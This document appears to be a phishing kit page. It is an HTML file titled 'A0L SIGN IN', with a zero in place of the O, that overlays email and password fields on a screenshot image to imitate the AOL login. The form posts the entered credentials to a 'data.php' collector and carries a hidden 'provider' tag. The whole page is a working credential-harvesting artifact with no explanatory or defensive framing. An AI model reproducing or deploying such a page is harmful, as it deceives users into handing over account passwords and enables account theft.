<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0014)about:internet -->
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>A0L SIGN IN</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:40px;top:32px;width:318px;height:483px;text-align:left;z-index:3;">
<img src="cdn/AA1.png" id="Image1"  style="width:318px;height:483px;" align="top" border="0"></div>

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:401px;height:570px;z-index:4">
<form name="Form1" method="post" action="data.php">

<input id="provider" name="provider" value="Aol" type="hidden">

<input id="email" style="position:absolute;left:71px;top:112px;width:252px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:0" name="email" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$"  type="email" required placeholder="Username or Email">

<input id="password" style="position:absolute;left:71px;top:159px;width:252px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:1" name="password"  type="password" required placeholder="Password">

<input id="Button1" name="Button1"  style="position:absolute;left:71px;top:266px;width:252px;height:42px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2" type="submit">
</form>
</div>
</body></html>